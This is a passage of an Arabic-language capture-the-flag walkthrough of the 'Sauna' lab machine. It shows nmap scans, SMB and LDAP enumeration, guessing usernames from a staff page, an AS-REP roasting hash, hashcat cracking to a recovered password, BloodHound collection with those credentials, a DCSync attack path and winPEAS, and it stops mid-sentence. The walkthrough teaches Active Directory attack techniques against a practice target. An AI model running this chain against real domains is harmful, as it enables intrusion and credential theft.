1- عادة رح قلك " تبدأ الاول بعمل Scan على الماشين ب nmap عشان تشوف ال Open Ports الموجودة و ال services/الخدمات و شو منهم فيه ثغرة/vulnerable فتستغله و طبعا بدون عمل استطلاع/recon او enumeration ما ممكن تبدأ اي عملية Pentesting او Hacking"
بس هي المرة رح قلك اعتبرها " طرق على المنافذ" او الشبابيك او الابواب صدقني ما فارقة
nmap -sV -sC -p- 10.10.10.175
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-05-12 09:06:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49675/tcp open msrpc Microsoft Windows RPC
49686/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h15m26s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-05-12T09:07:18
|_ start_date: N/A
في شوية شغلات مثيرة للاهتمام فخلينا نبحبش ("البحبشة" كلمة سورية أصلية تعني البحث) اكتر
smbclient -L 10.10.10.175
Anonymous login successful
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
ما طلع معي شي فرحت اشوف LDAP
LDAP
nmap -n -sV -p 389, 3268 --script "ldap* and not brute" 10.10.10.175
في معلومات كتير هون, و ما كان في منها الفائدة الكبيرة, بس لسا قراتها ممتعة
بما انه ما طلعنا بشي بال SMB, LDAP قررت اروح لل HTTP او الموقع
The Website
بلشت العب شوي و اطقطق هون و هنيك (الهاء بالضم 🙃) و استخدمت ادوات متل dirb, gobuster قرات ال source code او الكود المصدري, و انا عم اتصفح الصفحات وصلت ل about.html و فيها اسماء الفريق
هلق بما انو معنا الاسماء, فالموضوع كلاتي الاسماء رح تستخدم ك usernames او للحاسابات جوا السيرفر, ف أحيانا بتنكتب مثلأ:
1- اول حرف من الاسم و الكنية
2- الاسم الاول و الكنية
هي امثلة ممكن تكون مكتوبة بشكل مختلف, بس انا مشيت مع المثال الاول و عملت قائمة كلاتي:
fsmith
hbear
skerb
scoins
btaylor
sdriver
هون فينك تعمل عدة شغلات بالمستخدمين, انا بدأت باداة kerbrute بحيث اتاكد ان في واحد منهم شغال
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:d2ce372b78b81236a49833b9c8695bdd$bf7e5d488a39f63eebd3fc4ee09e6cbbbd5781bf48acb29da299be1d2779ceca08e326f421937d0c3157faf4af766098a9b4a358093c3fbfd146113e9f2cc328d0cb39043b6147e3f495900063ff82059d54bc01cb9599629460d0629e472012316d812f6311da1e995258eef4fc51cceb5220f12bf7f6d45645bd2e07575d9d26692672324bf9e869089c93f91ad0a35446709738d6b6d7c6f026a86aec1e1d052d509d0570edd23d8c5a49e0cfed6ed2cc229124a2686de8d5c04e863ce2cd580513081e746cafcd4e97c8e76d5355c38a28c80f341a71eb4bf1fdebc631fe5556617f82a7b943c67d66ebfd5abb9161a7a0f0aa0e244a1a772b269c176dfa
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
حصلنا هاش, انا بحب اكسره او اعمله كراك لاني بحب اعرف شو هي كلمة السر, أحيانا الناس بتأبدع بكلمات السر
hashcat.exe -m 18200 fsmith_hash.txt rockyou.txt -d 1 # -d 1 to select my GPU
smbmap -H 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'
[+] IP: 10.10.10.175:445 Name: EGOTISTICAL-BANK.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
print$ READ ONLY Printer Drivers
RICOH Aficio SP 8300DN PCL 6 NO ACCESS We cant print money
SYSVOL READ ONLY Logon server share
smbclient -L 10.10.10.175 -U 'fsmith'
Enter WORKGROUP\fsmith's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
print$ Disk Printer Drivers
RICOH Aficio SP 8300DN PCL 6 Printer We cant print money
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
بعد ما تجيب الفلاج يا صديقي العزيز رح نبدأ ال enum, عادة بحب اكون شوي يدوي و استخدم شي متل powerview, بس بدي اخلص هي الماشين بسرعة ف رح استخدم ادوات اوتومايتيكة متل SharpHound + BloodHound و winPEASx64.exe
BloodHound
نبدأ مع BloodHound, اتبع الخطوات المعتادة:
1- حمل Sharphound على الماشين
2- اعمللها import او شغلها
3-
Invoke-Bloodhound -CollectionMethod All -Domain htb.local -LDAPUser fsmith -LDAPPass Thestrokes23
4- نزل ملف ال .zip ع جهازك
5- ارميه ب BloodHound و خلينا نمرح شوي
قصة طويلة, قعدت العب كتير هون و هيك كان شكلي
ف رح قلك انا شو سويت ع طول
اول شي بحثت على fsmith و علمته ك Owned و حاولت اشوف وين فيني اروح مع هاد الحساب, شو فيني سوي فيه !
ف اضغط على اسم المستخدم بعدين على Reachable High Value Targets
بما انو في CanPSRemote فحاولت استغلها اعمل powershell remote و ماشتغلت, و انا فاهمك الموضوع بكسر القلب بس هي الحياة يا صديقي لازم نتابع
رجعت مرة تانية لل analysis و ضغطت على Find Principals with DCSync Rights
المستخدم المعه DCSync rights بعني ان ممكن نستخدمه لنعمل DCSyns Attack فمنقدر ننتحل ال DC و نطلع hashes نعدل , نعمل امور معينة, لو عم تسئل شو هو ال DC اعتبره المدير, الرئيس, القائد, الحاكم, big dog, الهدف الاعلى, اي شي بدك ياه
بعد ما ضغطت فوق اول شي شفته هو مستخدم مع GetChanges Rights و هاد ممكن يفيد
ازا ضغطت كليك يمين على ال GetChanges بعدها Help رح تعرف ان ممكن تعمل DCSyncs attack مع هاد المستخدم
هيك معنا المستخدم بس بدنا كلمة السر, ف يلا كمان enum
winPEAS
بلشت ب winPEASx64.exe
./winPEASx64.exe
و من بيانات كتير و نتائج كتير مثيرة للاهتمام حصلت هي :